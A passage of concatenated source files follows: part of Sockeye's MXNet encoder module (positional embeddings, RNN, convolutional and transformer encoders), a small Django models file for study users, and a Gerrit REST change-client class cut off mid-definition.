depth=self.num_embed,
name="%spositional_encodings" % self.prefix,
op_type='positional_encodings'))
if self.scale_down_positions:
positions = positions * (self.num_embed ** -0.5)
embedding = mx.sym.broadcast_add(data, positions)
return embedding, data_length, seq_len
def encode_positions(self,
positions: mx.sym.Symbol,
data: mx.sym.Symbol) -> mx.sym.Symbol:
"""
:param positions: (batch_size,)
:param data: (batch_size, num_embed)
:return: (batch_size, num_embed)
"""
# (batch_size, 1)
positions = mx.sym.expand_dims(positions, axis=1)
# (num_embed,)
channels = mx.sym.arange(0, self.num_embed // 2)
# (1, num_embed,)
scaling = mx.sym.expand_dims(1. / mx.sym.pow(10000, (2 * channels) / self.num_embed), axis=0)
# (batch_size, num_embed/2)
scaled_positions = mx.sym.dot(positions, scaling)
sin = mx.sym.sin(scaled_positions)
cos = mx.sym.cos(scaled_positions)
# (batch_size, num_embed)
pos_embedding = mx.sym.concat(sin, cos, dim=1)
if self.scale_up_input:
data = data * (self.num_embed ** 0.5)
if self.scale_down_positions:
pos_embedding = pos_embedding * (self.num_embed ** -0.5)
return mx.sym.broadcast_add(data, pos_embedding, name="%s_add" % self.prefix)
def get_num_hidden(self) -> int:
return self.num_embed
class AddLearnedPositionalEmbeddings(PositionalEncoder):
"""
Takes an encoded sequence and adds positional embeddings to it, which are learned jointly. Note that this will
limited the maximum sentence length during decoding.
:param num_embed: Embedding size.
:param max_seq_len: Maximum sequence length.
:param prefix: Name prefix for symbols of this encoder.
:param embed_weight: Optionally use an existing embedding matrix instead of creating a new one.
:param dtype: Data type.
"""
def __init__(self,
num_embed: int,
max_seq_len: int,
prefix: str,
embed_weight: Optional[mx.sym.Symbol] = None,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__(dtype)
self.num_embed = num_embed
self.max_seq_len = max_seq_len
self.prefix = prefix
if embed_weight is not None:
self.embed_weight = embed_weight
else:
self.embed_weight = mx.sym.Variable(prefix + "weight")
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
:param data: (batch_size, source_seq_len, num_embed)
:param data_length: (batch_size,)
:param seq_len: sequence length.
:return: (batch_size, source_seq_len, num_embed)
"""
# (1, source_seq_len)
positions = mx.sym.expand_dims(data=mx.sym.arange(start=0, stop=seq_len, step=1), axis=0)
# (1, source_seq_len, num_embed)
pos_embedding = mx.sym.Embedding(data=positions,
input_dim=self.max_seq_len,
weight=self.embed_weight,
output_dim=self.num_embed,
name=self.prefix + "pos_embed")
return mx.sym.broadcast_add(data, pos_embedding, name="%s_add" % self.prefix), data_length, seq_len
def encode_positions(self,
positions: mx.sym.Symbol,
data: mx.sym.Symbol) -> mx.sym.Symbol:
"""
:param positions: (batch_size,)
:param data: (batch_size, num_embed)
:return: (batch_size, num_embed)
"""
# (batch_size, source_seq_len, num_embed)
pos_embedding = mx.sym.Embedding(data=positions,
input_dim=self.max_seq_len,
weight=self.embed_weight,
output_dim=self.num_embed,
name=self.prefix + "pos_embed")
return mx.sym.broadcast_add(data, pos_embedding, name="%s_add" % self.prefix)
def get_num_hidden(self) -> int:
return self.num_embed
def get_max_seq_len(self) -> Optional[int]:
# we can only support sentences as long as the maximum length during training.
return self.max_seq_len
class NoOpPositionalEmbeddings(PositionalEncoder):
"""
Simple NoOp pos embedding. It does not modify the data, but avoids lots of if statements.
:param dtype: Data type.
"""
def __init__(self, num_embed, dtype: str = C.DTYPE_FP32) -> None:
super().__init__(dtype)
self.num_embed = num_embed
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
return data, data_length, seq_len
def encode_positions(self,
positions: mx.sym.Symbol,
data: mx.sym.Symbol) -> mx.sym.Symbol:
return data
def get_num_hidden(self) -> int:
return self.num_embed
def _get_positional_embedding_params(positional_embedding_type: str,
num_embed: int,
max_seq_len: int,
fixed_pos_embed_scale_up_input: bool = False,
fixed_pos_embed_scale_down_positions: bool = False,
prefix: str = '') -> Tuple[Callable, Dict]:
if positional_embedding_type == C.FIXED_POSITIONAL_EMBEDDING:
return AddSinCosPositionalEmbeddings, dict(num_embed=num_embed,
scale_up_input=fixed_pos_embed_scale_up_input,
scale_down_positions=fixed_pos_embed_scale_down_positions,
prefix=prefix)
elif positional_embedding_type == C.LEARNED_POSITIONAL_EMBEDDING:
return AddLearnedPositionalEmbeddings, dict(num_embed=num_embed,
max_seq_len=max_seq_len,
prefix=prefix)
elif positional_embedding_type == C.NO_POSITIONAL_EMBEDDING:
return NoOpPositionalEmbeddings, dict(num_embed=num_embed)
else:
raise ValueError("Unknown positional embedding type %s" % positional_embedding_type)
def get_positional_embedding(positional_embedding_type: str,
num_embed: int,
max_seq_len: int,
fixed_pos_embed_scale_up_input: bool = False,
fixed_pos_embed_scale_down_positions: bool = False,
prefix: str = '') -> PositionalEncoder:
cls, encoder_params = _get_positional_embedding_params(positional_embedding_type,
num_embed,
max_seq_len,
fixed_pos_embed_scale_up_input,
fixed_pos_embed_scale_down_positions,
prefix)
return cls(**encoder_params)
class EncoderSequence(Encoder):
"""
A sequence of encoders is itself an encoder.
:param encoders: List of encoders.
:param dtype: Data type.
"""
def __init__(self, encoders: List[Encoder], dtype: str = C.DTYPE_FP32) -> None:
super().__init__(dtype)
self.encoders = encoders
def encode(self,
data: mx.sym.Symbol,
data_length: mx.sym.Symbol,
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
for encoder in self.encoders:
data, data_length, seq_len = encoder.encode(data, data_length, seq_len)
return data, data_length, seq_len
def get_num_hidden(self) -> int:
"""
Return the representation size of this encoder.
"""
return self.encoders[-1].get_num_hidden()
def get_encoded_seq_len(self, seq_len: int) -> int:
"""
Returns the size of the encoded sequence.
"""
for encoder in self.encoders:
seq_len = encoder.get_encoded_seq_len(seq_len)
return seq_len
def get_max_seq_len(self) -> Optional[int]:
"""
:return: The maximum length supported by the encoder if such a restriction exists.
"""
max_seq_len = min((encoder.get_max_seq_len()
for encoder in self.encoders if encoder.get_max_seq_len() is not None), default=None)
return max_seq_len
def append(self, cls, infer_hidden: bool = False, **kwargs) -> Encoder:
"""
Extends sequence with new Encoder. 'dtype' gets passed into Encoder instance if not present in parameters
and supported by specific Encoder type.
:param cls: Encoder type.
:param infer_hidden: If number of hidden should be inferred from previous encoder.
:param kwargs: Named arbitrary parameters for Encoder.
:return: Instance of Encoder.
"""
params = dict(kwargs)
if infer_hidden:
params['num_hidden'] = self.get_num_hidden()
sig_params = inspect.signature(cls.__init__).parameters
if 'dtype' in sig_params and 'dtype' not in kwargs:
params['dtype'] = self.dtype
encoder = cls(**params)
self.encoders.append(encoder)
return encoder
class EmptyEncoder(Encoder):
"""
This encoder ignores the input data and simply returns zero-filled states in the expected shape.
:param config: configuration.
"""
def __init__(self,
config: EmptyEncoderConfig) -> None:
super().__init__(config.dtype)
self.num_embed = config.num_embed
self.num_hidden = config.num_hidden
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Expected number of empty states (zero-filled).
"""
# outputs: (batch_size, seq_len, num_hidden)
outputs = mx.sym.dot(data, mx.sym.zeros((self.num_embed, self.num_hidden)))
return outputs, data_length, seq_len
def get_num_hidden(self):
"""
Return the representation size of this encoder.
"""
return self.num_hidden
class RecurrentEncoder(Encoder):
"""
Uni-directional (multi-layered) recurrent encoder.
:param rnn_config: RNN configuration.
:param prefix: Prefix for variable names.
:param layout: Data layout.
"""
def __init__(self,
rnn_config: rnn.RNNConfig,
prefix: str = C.STACKEDRNN_PREFIX,
layout: str = C.TIME_MAJOR) -> None:
super().__init__(rnn_config.dtype)
self.rnn_config = rnn_config
self.layout = layout
self.rnn = rnn.get_stacked_rnn(rnn_config, prefix)
def encode(self,
data: mx.sym.Symbol,
data_length: Optional[mx.sym.Symbol],
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
outputs, _ = self.rnn.unroll(seq_len, inputs=data, merge_outputs=True, layout=self.layout)
return outputs, data_length, seq_len
def get_rnn_cells(self):
"""
Returns RNNCells used in this encoder.
"""
return [self.rnn]
def get_num_hidden(self):
"""
Return the representation size of this encoder.
"""
return self.rnn_config.num_hidden
class BiDirectionalRNNEncoder(Encoder):
"""
An encoder that runs a forward and a reverse RNN over input data.
States from both RNNs are concatenated together.
:param rnn_config: RNN configuration.
:param prefix: Prefix for variable names.
:param layout: Data layout.
:param encoder_class: Recurrent encoder class to use.
"""
def __init__(self,
rnn_config: rnn.RNNConfig,
prefix=C.BIDIRECTIONALRNN_PREFIX,
layout=C.TIME_MAJOR,
encoder_class: Callable = RecurrentEncoder) -> None:
utils.check_condition(rnn_config.num_hidden % 2 == 0,
"num_hidden must be a multiple of 2 for BiDirectionalRNNEncoders.")
super().__init__(rnn_config.dtype)
self.rnn_config = rnn_config
self.internal_rnn_config = rnn_config.copy(num_hidden=rnn_config.num_hidden // 2)
if layout[0] == 'N':
logger.warning("Batch-major layout for encoder input. Consider using time-major layout for faster speed")
# time-major layout as _encode needs to swap layout for SequenceReverse
self.forward_rnn = encoder_class(rnn_config=self.internal_rnn_config,
prefix=prefix + C.FORWARD_PREFIX,
layout=C.TIME_MAJOR)
self.reverse_rnn = encoder_class(rnn_config=self.internal_rnn_config,
prefix=prefix + C.REVERSE_PREFIX,
layout=C.TIME_MAJOR)
self.layout = layout
self.prefix = prefix
def encode(self,
data: mx.sym.Symbol,
data_length: mx.sym.Symbol,
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data (data, data_length, seq_len).
"""
if self.layout[0] == 'N':
data = mx.sym.swapaxes(data=data, dim1=0, dim2=1)
data = self._encode(data, data_length, seq_len)
if self.layout[0] == 'N':
data = mx.sym.swapaxes(data=data, dim1=0, dim2=1)
return data, data_length, seq_len
def _encode(self, data: mx.sym.Symbol, data_length: mx.sym.Symbol, seq_len: int) -> mx.sym.Symbol:
"""
Bidirectionally encodes time-major data.
"""
# (seq_len, batch_size, num_embed)
data_reverse = mx.sym.SequenceReverse(data=data, sequence_length=data_length,
use_sequence_length=True)
# (seq_length, batch, cell_num_hidden)
hidden_forward, _, _ = self.forward_rnn.encode(data, data_length, seq_len)
# (seq_length, batch, cell_num_hidden)
hidden_reverse, _, _ = self.reverse_rnn.encode(data_reverse, data_length, seq_len)
# (seq_length, batch, cell_num_hidden)
hidden_reverse = mx.sym.SequenceReverse(data=hidden_reverse, sequence_length=data_length,
use_sequence_length=True)
# (seq_length, batch, 2 * cell_num_hidden)
hidden_concat = mx.sym.concat(hidden_forward, hidden_reverse, dim=2, name="%s_rnn" % self.prefix)
return hidden_concat
def get_num_hidden(self) -> int:
"""
Return the representation size of this encoder.
"""
return self.rnn_config.num_hidden
def get_rnn_cells(self) -> List[mx.rnn.BaseRNNCell]:
"""
Returns a list of RNNCells used by this encoder.
"""
return self.forward_rnn.get_rnn_cells() + self.reverse_rnn.get_rnn_cells()
class ConvolutionalEncoder(Encoder):
"""
Encoder that uses convolution instead of recurrent connections, similar to Gehring et al. 2017.
:param config: Configuration for convolutional encoder.
:param prefix: Name prefix for operations in this encoder.
"""
def __init__(self,
config: ConvolutionalEncoderConfig,
prefix: str = C.CNN_ENCODER_PREFIX) -> None:
super().__init__(config.dtype)
self.config = config
# initialize the weights of the linear transformation required for the residual connections
self.i2h_weight = mx.sym.Variable('%si2h_weight' % prefix)
# initialize the layers of blocks containing a convolution and a GLU, since
# every layer is shared over all encode calls
self.layers = [convolution.ConvolutionBlock(
config.cnn_config,
pad_type='centered',
prefix="%s%d_" % (prefix, i)) for i in range(config.num_layers)]
def encode(self,
data: mx.sym.Symbol,
data_length: mx.sym.Symbol,
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data with a stack of Convolution+GLU blocks given sequence lengths of individual examples
and maximum sequence length.
:param data: Input data. Shape: (batch_size, seq_len, input_num_hidden).
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded version of the data.
"""
# data: (batch_size, seq_len, num_hidden)
data = mx.sym.FullyConnected(data=data,
num_hidden=self.config.cnn_config.num_hidden,
no_bias=True,
flatten=False,
weight=self.i2h_weight)
# Multiple layers with residual connections:
for layer in self.layers:
data = data + layer(data, data_length, seq_len)
return data, data_length, seq_len
def get_num_hidden(self) -> int:
return self.config.cnn_config.num_hidden
class TransformerEncoder(Encoder):
"""
Non-recurrent encoder based on the transformer architecture in:
Attention Is All You Need, Figure 1 (left)
Vaswani et al. (https://arxiv.org/pdf/1706.03762.pdf).
:param config: Configuration for transformer encoder.
:param prefix: Name prefix for operations in this encoder.
"""
def __init__(self,
config: transformer.TransformerConfig,
prefix: str = C.TRANSFORMER_ENCODER_PREFIX) -> None:
super().__init__(config.dtype)
self.config = config
self.prefix = prefix
self.layers = [transformer.TransformerEncoderBlock(
config, prefix="%s%d_" % (prefix, i)) for i in range(config.num_layers)]
self.final_process = transformer.TransformerProcessBlock(sequence=config.preprocess_sequence,
dropout=config.dropout_prepost,
prefix="%sfinal_process_" % prefix)
def encode(self,
data: mx.sym.Symbol,
data_length: mx.sym.Symbol,
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data data, data_length, seq_len.
"""
data = utils.cast_conditionally(data, self.dtype)
if self.config.dropout_prepost > 0.0:
data = mx.sym.Dropout(data=data, p=self.config.dropout_prepost)
# (batch_size * heads, 1, max_length)
bias = mx.sym.expand_dims(transformer.get_variable_length_bias(lengths=data_length,
max_length=seq_len,
num_heads=self.config.attention_heads,
fold_heads=True,
name="%sbias" % self.prefix), axis=1)
bias = utils.cast_conditionally(bias, self.dtype)
for i, layer in enumerate(self.layers):
# (batch_size, seq_len, config.model_size)
data = layer(data, bias)
data = self.final_process(data=data, prev=None)
data = utils.uncast_conditionally(data, self.dtype)
return data, data_length, seq_len
def get_num_hidden(self) -> int:
"""
Return the representation size of this encoder.
"""
return self.config.model_size
class ConvolutionalEmbeddingConfig(config.Config):
"""
Convolutional embedding encoder configuration.
:param num_embed: Input embedding size.
:param output_dim: Output segment embedding size.
:param max_filter_width: Maximum filter width for convolutions.
:param num_filters: Number of filters of each width.
:param pool_stride: Stride for pooling layer after convolutions.
:param num_highway_layers: Number of highway layers for segment embeddings.
:param dropout: Dropout probability.
:param add_positional_encoding: Dropout probability.
:param dtype: Data type.
"""
def __init__(self,
num_embed: int,
output_dim: int = None,
max_filter_width: int = 8,
num_filters: Tuple[int, ...] = (200, 200, 250, 250, 300, 300, 300, 300),
pool_stride: int = 5,
num_highway_layers: int = 4,
dropout: float = 0.0,
add_positional_encoding: bool = False,
dtype: str = C.DTYPE_FP32) -> None:
super().__init__()
self.num_embed = num_embed
self.output_dim = output_dim
self.max_filter_width = max_filter_width
self.num_filters = num_filters
self.pool_stride = pool_stride
self.num_highway_layers = num_highway_layers
self.dropout = dropout
self.add_positional_encoding = add_positional_encoding
if self.output_dim is None:
self.output_dim = sum(self.num_filters)
self.dtype = dtype
class ConvolutionalEmbeddingEncoder(Encoder):
"""
An encoder developed to map a sequence of character embeddings to a shorter sequence of segment
embeddings using convolutional, pooling, and highway layers. More generally, it maps a sequence
of input embeddings to a sequence of span embeddings.
* "Fully Character-Level Neural Machine Translation without Explicit Segmentation"
Jason Lee; Kyunghyun Cho; Thomas Hofmann (https://arxiv.org/pdf/1610.03017.pdf)
:param config: Convolutional embedding config.
:param prefix: Name prefix for symbols of this encoder.
"""
def __init__(self,
config: ConvolutionalEmbeddingConfig,
prefix: str = C.CHAR_SEQ_ENCODER_PREFIX) -> None:
utils.check_condition(len(config.num_filters) == config.max_filter_width,
"num_filters must have max_filter_width elements.")
super().__init__(config.dtype)
self.num_embed = config.num_embed
self.output_dim = config.output_dim
self.max_filter_width = config.max_filter_width
self.num_filters = config.num_filters[:]
self.pool_stride = config.pool_stride
self.num_highway_layers = config.num_highway_layers
self.prefix = prefix
self.dropout = config.dropout
self.add_positional_encoding = config.add_positional_encoding
self.conv_weight = {filter_width: mx.sym.Variable("%s%s%d%s" % (self.prefix, "conv_", filter_width, "_weight"))
for filter_width in range(1, self.max_filter_width + 1)}
self.conv_bias = {filter_width: mx.sym.Variable("%s%s%d%s" % (self.prefix, "conv_", filter_width, "_bias"))
for filter_width in range(1, self.max_filter_width + 1)}
self.project_weight = mx.sym.Variable(self.prefix + "project_weight")
self.project_bias = mx.sym.Variable(self.prefix + "project_bias")
self.gate_weight = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "gate_", i, "_weight"))
for i in range(self.num_highway_layers)]
self.gate_bias = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "gate_", i, "_bias"))
for i in range(self.num_highway_layers)]
self.transform_weight = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "transform_", i, "_weight"))
for i in range(self.num_highway_layers)]
self.transform_bias = [mx.sym.Variable("%s%s%d%s" % (self.prefix, "transform_", i, "_bias"))
for i in range(self.num_highway_layers)]
def encode(self,
data: mx.sym.Symbol,
data_length: mx.sym.Symbol,
seq_len: int) -> Tuple[mx.sym.Symbol, mx.sym.Symbol, int]:
"""
Encodes data given sequence lengths of individual examples and maximum sequence length.
:param data: Input data.
:param data_length: Vector with sequence lengths.
:param seq_len: Maximum sequence length.
:return: Encoded versions of input data data, data_length, seq_len.
"""
total_num_filters = sum(self.num_filters)
encoded_seq_len = self.get_encoded_seq_len(seq_len)
# (batch_size, channel=1, seq_len, num_embed)
data = mx.sym.Reshape(data=data, shape=(-1, 1, seq_len, self.num_embed))
# Convolution filters of width 1..N
conv_outputs = []
for filter_width, num_filter in enumerate(self.num_filters, 1):
# "half" padding: output length == input length
pad_before = ceil((filter_width - 1) / 2)
pad_after = floor((filter_width - 1) / 2)
# (batch_size, channel=1, seq_len + (filter_width - 1), num_embed)
padded = mx.sym.pad(data=data,
mode="constant",
constant_value=0,
pad_width=(0, 0, 0, 0, pad_before, pad_after, 0, 0))
# (batch_size, num_filter, seq_len, num_scores=1)
conv = mx.sym.Convolution(data=padded,
# cudnn_tune="off",
kernel=(filter_width, self.num_embed),
num_filter=num_filter,
weight=self.conv_weight[filter_width],
bias=self.conv_bias[filter_width])
conv = mx.sym.Activation(data=conv, act_type="relu")
conv_outputs.append(conv)
# (batch_size, total_num_filters, seq_len, num_scores=1)
conv_concat = mx.sym.concat(*conv_outputs, dim=1)
# Max pooling with stride
uncovered = seq_len % self.pool_stride
if uncovered > 0:
pad_after = self.pool_stride - uncovered
# (batch_size, total_num_filters, seq_len + pad_to_final_stride, num_scores=1)
conv_concat = mx.sym.pad(data=conv_concat,
mode="constant",
constant_value=0,
pad_width=(0, 0, 0, 0, 0, pad_after, 0, 0))
# (batch_size, total_num_filters, seq_len/stride, num_scores=1)
pool = mx.sym.Pooling(data=conv_concat,
pool_type="max",
kernel=(self.pool_stride, 1),
stride=(self.pool_stride, 1))
# (batch_size, total_num_filters, seq_len/stride)
pool = mx.sym.reshape(data=pool,
shape=(-1, total_num_filters, encoded_seq_len))
# (batch_size, seq_len/stride, total_num_filters)
pool = mx.sym.swapaxes(data=pool, dim1=1, dim2=2)
if self.dropout > 0:
pool = mx.sym.Dropout(data=pool, p=self.dropout)
# Raw segment embeddings reshaped for highway network
# (batch_size * seq_len/stride, total_num_filters)
seg_embedding = mx.sym.Reshape(data=pool, shape=(-3, total_num_filters))
# Projection layer if requested output dimension is different from total number of filters
# (TransformerEncoder compatibility, not in original paper)
if self.output_dim != total_num_filters:
# (batch_size * seq_len/stride, outut_dim)
seg_embedding = mx.sym.FullyConnected(data=seg_embedding,
num_hidden=self.output_dim,
weight=self.project_weight,
bias=self.project_bias)
seg_embedding = mx.sym.Activation(data=seg_embedding, act_type="relu")
if self.dropout > 0:
seg_embedding = mx.sym.Dropout(data=seg_embedding, p=self.dropout)
# Highway network
for i in range(self.num_highway_layers):
# Gate
gate = mx.sym.FullyConnected(data=seg_embedding,
num_hidden=self.output_dim,
weight=self.gate_weight[i],
bias=self.gate_bias[i])
gate = mx.sym.Activation(data=gate, act_type="sigmoid")
if self.dropout > 0:
gate = mx.sym.Dropout(data=gate, p=self.dropout)
# Transform
transform = mx.sym.FullyConnected(data=seg_embedding,
num_hidden=self.output_dim,
weight=self.transform_weight[i],
bias=self.transform_bias[i])
transform = mx.sym.Activation(data=transform, act_type="relu")
if self.dropout > 0:
transform = mx.sym.Dropout(data=transform, p=self.dropout)
# Connection
seg_embedding = gate * transform + (1 - gate) * seg_embedding
# (batch_size, seq_len/stride, output_dim) aka
# (batch_size, encoded_seq_len, num_segment_embed)
seg_embedding = mx.sym.Reshape(data=seg_embedding,
shape=(-1, encoded_seq_len, self.output_dim))
# Dropout on final segment embeddings
if self.dropout > 0:
seg_embedding = mx.sym.Dropout(data=seg_embedding, p=self.dropout)
# Ceiling function isn't differentiable so this will throw errors if we
# attempt to compute gradients. Fortunately we aren't updating inputs
# so we can just block the backward pass here.
encoded_data_length = mx.sym.BlockGrad(mx.sym.ceil(data_length / self.pool_stride))
return seg_embedding, encoded_data_length, encoded_seq_len
def get_num_hidden(self) -> int:
"""
Return the representation size of this encoder.
"""
return self.output_dim
def get_encoded_seq_len(self, seq_len: int) -> int:
"""
Returns the size of the encoded sequence.
"""
return int(ceil(seq_len / self.pool_stride))
EncoderConfig = Union[RecurrentEncoderConfig, transformer.TransformerConfig, ConvolutionalEncoderConfig,
EmptyEncoderConfig]
if ImageEncoderConfig is not None:
EncoderConfig = Union[EncoderConfig, ImageEncoderConfig] # type: ignore
| {
"content_hash": "59116e25b34f8083c8e4696743578318",
"timestamp": "",
"source": "github",
"line_count": 1265,
"max_line_length": 119,
"avg_line_length": 41.95573122529644,
"alnum_prop": 0.5692994686663904,
"repo_name": "artemsok/sockeye",
"id": "95c313bb6d419aacf05ada826c4b6335cd603e1a",
"size": "53640",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "sockeye/encoder.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "824"
},
{
"name": "Dockerfile",
"bytes": "1028"
},
{
"name": "JavaScript",
"bytes": "4196"
},
{
"name": "Python",
"bytes": "1548538"
},
{
"name": "Shell",
"bytes": "7456"
}
],
"symlink_target": ""
} |
from django.db import models
from django.contrib.auth.models import User
class StudyUserResearcher(models.Model):
"""A researcher user.
fields:
user: OneToOne, to Django User model
"""
user = models.OneToOneField(User)
class StudyUserParticipant(models.Model):
"""A study participant.
fields:
user: OneToOne, to Django User model
is_enrolled: Boolean, default is False
"""
user = models.OneToOneField(User)
is_enrolled = models.BooleanField(default=False)
| {
"content_hash": "588876769a3d9545963d67938491b050",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 52,
"avg_line_length": 22.73913043478261,
"alnum_prop": 0.6864244741873805,
"repo_name": "PersonalGenomesOrg/studyus-project",
"id": "ac345c32c18b9aa67c14b07e04fb4036c51f4f72",
"size": "523",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "studyus/studyuser/models.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7799"
}
],
"symlink_target": ""
} |
from requests import utils as requests_utils
from gerritclient.v1 import base
class ChangeClient(base.BaseV1Client):
api_path = "/changes/"
def get_all(self, query, options=None, limit=None, skip=None):
"""Query changes.
:param query: Queries as a list of string
:param options: List of options to fetch additional data about changes
:param limit: Int value that allows to limit the number of changes
to be included in the output results
:param skip: Int value that allows to skip the given number of
changes from the beginning of the list
:return A list of ChangeInfo entries
"""
params = {k: v for k, v in (('o', options),
('n', limit),
('S', skip)) if v is not None}
request_path = "{api_path}{query}".format(
api_path=self.api_path,
query="?q={query}".format(query='&q='.join(query)))
return self.connection.get_request(request_path, params=params)
def get_by_id(self, change_id, detailed=False, options=None):
"""Retrieve a change.
:param change_id: Identifier that uniquely identifies one change.
:param detailed: boolean value, if True then retrieve a change with
labels, detailed labels, detailed accounts,
reviewer updates, and messages.
:param options: List of options to fetch additional data about a change
:return: ChangeInfo entity is returned that describes the change.
"""
params = {'o': options}
request_path = "{api_path}{change_id}/{detail}".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''),
detail="detail" if detailed else "")
return self.connection.get_request(request_path, params=params)
def create(self, data):
"""Create a new change."""
return self.connection.post_request(self.api_path, json_data=data)
def delete(self, change_id):
"""Delete a change."""
request_path = "{api_path}{change_id}".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.delete_request(request_path, data={})
def abandon(self, change_id):
"""Abandon a change."""
request_path = "{api_path}{change_id}/abandon".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data={})
def restore(self, change_id):
"""Restore a change."""
request_path = "{api_path}{change_id}/restore".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data={})
def revert(self, change_id, message=None):
"""Revert a change."""
data = {k: v for k, v in (('message', message),) if v is not None}
request_path = "{api_path}{change_id}/revert".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data=data)
def rebase(self, change_id, parent=None):
"""Rebase a change."""
data = {k: v for k, v in (('base', parent),) if v is not None}
request_path = "{api_path}{change_id}/rebase".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data=data)
def move(self, change_id, branch, message=None):
"""Move a change."""
data = {k: v for k, v in (('destination_branch', branch),
('message', message)) if v is not None}
request_path = "{api_path}{change_id}/move".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data=data)
def submit(self, change_id, on_behalf_of=None, notify=None):
"""Submit a change."""
# TODO(vkulanov): add 'notify_details' field (parameter) support
data = {k: v for k, v in (('on_behalf_of', on_behalf_of),
('notify', notify)) if v is not None}
request_path = "{api_path}{change_id}/submit".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data=data)
def get_topic(self, change_id):
"""Retrieve the topic of a change."""
request_path = "{api_path}{change_id}/topic".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.get_request(request_path)
def set_topic(self, change_id, topic):
"""Set the topic of a change."""
data = {'topic': topic}
request_path = "{api_path}{change_id}/topic".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.put_request(request_path, json_data=data)
def delete_topic(self, change_id):
"""Delete the topic of a change."""
request_path = "{api_path}{change_id}/topic".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.delete_request(request_path, data={})
def get_assignee(self, change_id):
"""Retrieve the account of the user assigned to a change."""
request_path = "{api_path}{change_id}/assignee".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.get_request(request_path)
def get_assignees(self, change_id):
"""Retrieve a list of every user ever assigned to a change."""
request_path = "{api_path}{change_id}/past_assignees".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.get_request(request_path)
def set_assignee(self, change_id, account_id):
"""Set the assignee of a change."""
data = {'assignee': account_id}
request_path = "{api_path}{change_id}/assignee".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.put_request(request_path, json_data=data)
def delete_assignee(self, change_id):
"""Delete the assignee of a change."""
request_path = "{api_path}{change_id}/assignee".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.delete_request(request_path, data={})
def publish_draft(self, change_id):
"""Publish a draft change."""
request_path = "{api_path}{change_id}/publish".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data={})
def get_included(self, change_id):
"""Retrieve the branches and tags in which a change is included."""
request_path = "{api_path}{change_id}/in".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.get_request(request_path)
def index(self, change_id):
"""Add or update the change in the secondary index."""
request_path = "{api_path}{change_id}/index".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''))
return self.connection.post_request(request_path, json_data={})
def get_comments(self, change_id, comment_type=None):
"""List the published comments of all revisions of the change.
:param change_id: Identifier that uniquely identifies one change.
:param comment_type: Type of comments (None|'drafts'|'robotcomments')
None - published comments,
'drafts' - draft comments,
'robotcomments' - robotcomments.
:return A list of CommentInfo entries.
"""
request_path = "{api_path}{change_id}/{comment_type}".format(
api_path=self.api_path,
change_id=requests_utils.quote(change_id, safe=''),
comment_type='comments' if not comment_type else comment_type)
return self.connection.get_request(request_path)
def check_consistency(self, change_id):
